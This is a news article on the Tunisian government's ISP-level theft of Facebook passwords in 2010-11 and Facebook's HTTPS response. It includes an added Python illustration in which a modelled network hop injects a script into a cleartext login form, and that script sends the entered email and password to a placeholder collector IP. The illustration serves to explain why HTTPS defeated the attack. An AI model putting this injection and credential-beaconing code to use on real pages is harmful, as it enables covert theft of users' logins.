In recent weeks the world's eyes have been collectively focused on the small North African country of Tunisia. When street vendor and university graduate Mohamed Bouazizi carried out his self-immolation on the 10th of December, a wave of protests followed, culminating in President Zine El Abidine Ben Ali being toppled from power.
Something which may not have been as obvious is the role that the social networking sites Facebook and Twitter played during the uprising, serving as soapboxes for the masses to vent their anger and carry the revolution through. Recently, however, reports surfaced indicating that these purveyors of free speech could have been used just as effectively against the populace they served.
According to Alexis Madrigal from The Atlantic, Ben Ali's regime was in the process of attempting to steal the Facebook passwords of an entire nation.
Facebook chief security officer Joe Sullivan said that they started noticing abnormal signs from Tunisia around Christmas Day last year. They had received several reports from users saying, “It looks like someone logged into my account and deleted it,” Sullivan said.
Facebook's security team then started looking into the reports, with Tunisia's former state internet censorship agency, known as Ammar, pegged as the prime suspect. After more than ten days of investigating, Facebook realised the extent of the damage: Tunisian ISPs (internet service providers) had been running a piece of malicious code which recorded users' log-in information when they visited sites such as Facebook.
By early January it was clear that almost an entire country's passwords had been compromised, prompting Sullivan's team to take action. “We've had to deal with ISPs in the past who have tried to filter or block our site. In this case, we were confronted by ISPs that were doing something unprecedented in that they were being very active in their attempts to intercept user information.”
The software being run by Tunisian ISPs was in effect a country-wide keystroke logger, presumably feeding the passwords of all Tunisians to Ben Ali's corrupt regime. A keystroke logger is a type of malicious program that records exactly what a user types and can pick out passwords and email addresses from the data it captures. The usual advice against such a program, using a virtual keyboard such as the one supplied with Kaspersky Internet Security 2011, only helps when the logger is running on the user's own machine. Here the code ran at the ISP, in the network path between the user and Facebook, where it could read and rewrite anything carried over unencrypted HTTP; no on-screen keyboard can hide a password from a hop that sees the login page and the submitted form. The only real defence against that is encrypting the connection end to end.
To combat the problem, Sullivan's team launched a two-pronged response. Firstly, all Tunisian requests to Facebook were routed to HTTPS (instead of plain HTTP), which, unlike plain HTTP, encrypts the whole session between the browser and Facebook's servers, so that an ISP in the path can no longer read the pages it carries or the credentials submitted through them.
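As an added illustration (not code from the article, from The Atlantic or from Facebook), here is a small Python model of the situation described above and of why the HTTPS fix worked: a login page that travels over plain HTTP, a hostile network hop that splices a credential-copying script into it before it reaches the browser, and the same hop faced with a TLS record it cannot read. The page, the script, the example.com address and the collector IP are all constructed for this example; nothing here reproduces the actual code the Tunisian ISPs ran, which the reports do not describe in detail.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: a login page as an origin might have served it over plain HTTP.
# The form itself posts to an https:// URL, a setup that looks safe but is not, because
# the page carrying the form travels in cleartext and can be rewritten on the way.
_ORIGIN_BODY = (
    b"<html><body>\n"
    b'<form id="login" action="https://www.example.com/login" method="post">\n'
    b'<input name="email"><input name="pass" type="password">\n'
    b"<button>Log in</button>\n"
    b"</form></body></html>\n"
)
ORIGIN_LOGIN_PAGE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    + b"Content-Length: %d\r\n\r\n" % len(_ORIGIN_BODY)
    + _ORIGIN_BODY
)

# Hypothetical snippet a hostile hop would splice in: it copies the two fields at
# submit time and beacons them to a collector before the real POST goes out.
# 203.0.113.7 is a documentation address; the collector does not exist.
EXFIL_SCRIPT = (
    b"<script>\n"
    b"document.getElementById('login').addEventListener('submit', function () {\n"
    b"  var q = 'e=' + encodeURIComponent(this.email.value)\n"
    b"        + '&p=' + encodeURIComponent(this.pass.value);\n"
    b"  (new Image()).src = 'http://203.0.113.7/c?' + q;\n"
    b"});\n"
    b"</script>\n"
)


def hostile_hop(wire_bytes: bytes) -> bytes:
    """Model of the hostile ISP hop: splice the logger into any cleartext HTML login form."""
    # A TLS record, or anything else that is not a cleartext HTTP response, is opaque to it.
    if not wire_bytes.startswith(b"HTTP/1.") or b"text/html" not in wire_bytes:
        return wire_bytes
    head, sep, body = wire_bytes.partition(b"\r\n\r\n")
    if b"</form>" not in body:
        return wire_bytes
    body = body.replace(b"</form>", EXFIL_SCRIPT + b"</form>", 1)
    # Keep the framing valid so the browser reads the whole rewritten body.
    head = re.sub(rb"Content-Length: \d+", b"Content-Length: %d" % len(body), head)
    return head + sep + body


def tls_record(ciphertext: bytes) -> bytes:
    """TLS 1.2 application-data record framing (type 0x17, version 0x0303, length).
    The payload is whatever the cipher produced; no handshake or real cipher runs here."""
    return b"\x17\x03\x03" + len(ciphertext).to_bytes(2, "big") + ciphertext


def audit_login_page(scheme: str, received: bytes, origin_sent: bytes) -> list:
    """Findings about how a login form reached the browser: the transport that carried
    the page, where the form posts, and (for the origin's own security team, who know
    what they sent) whether the page changed in transit."""
    findings = []
    if scheme != "https":
        findings.append("login page served over plaintext HTTP: any hop in the path can rewrite it")
    m = re.search(rb'<form[^>]*\baction="([^"]+)"', received)
    if m and urlsplit(m.group(1).decode()).scheme != "https":
        findings.append("form posts credentials over plaintext HTTP")
    if received != origin_sent:
        findings.append("page differs from what the origin sent: content injected in transit")
    return findings


if __name__ == "__main__":
    # Plain HTTP: the hop reads the page and splices in the logger.
    over_http = hostile_hop(ORIGIN_LOGIN_PAGE)
    print(over_http.decode())
    print(audit_login_page("http", over_http, ORIGIN_LOGIN_PAGE))
    # HTTPS: the same hop sees only a TLS record and passes it through untouched.
    record = tls_record(b"\x9c\x42\x17\x00\xf3" * 8)  # constructed stand-in for ciphertext
    print(hostile_hop(record) == record)
```

The point the model makes is that an https:// form action on its own does not protect the login: the cleartext page that carries the form is what gets rewritten, so the page itself has to be served over HTTPS, which is what routing every Tunisian request to HTTPS achieved.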
Secondly, to restore control to users whose passwords had already been stolen, the team employed a “roadblock”: users were asked to identify their friends in a series of photos to determine whether they truly were the account holder, something a thief holding only the password would struggle to do.
The damage that can be inflicted by a password leak such as this is almost endless. While Facebook served as a portal through which to voice new opinions, it could in turn be used to identify exactly who was speaking out against the government, down to their name, the content of their Facebook messages, their email and even their favourite movie.
While Facebook's fixes seem to have worked for the most part, Tunisians have also succeeded in ousting their corrupt government in a revolution that seems to be spreading throughout the Arab world. It turns out Facebook can be the hero sometimes after all.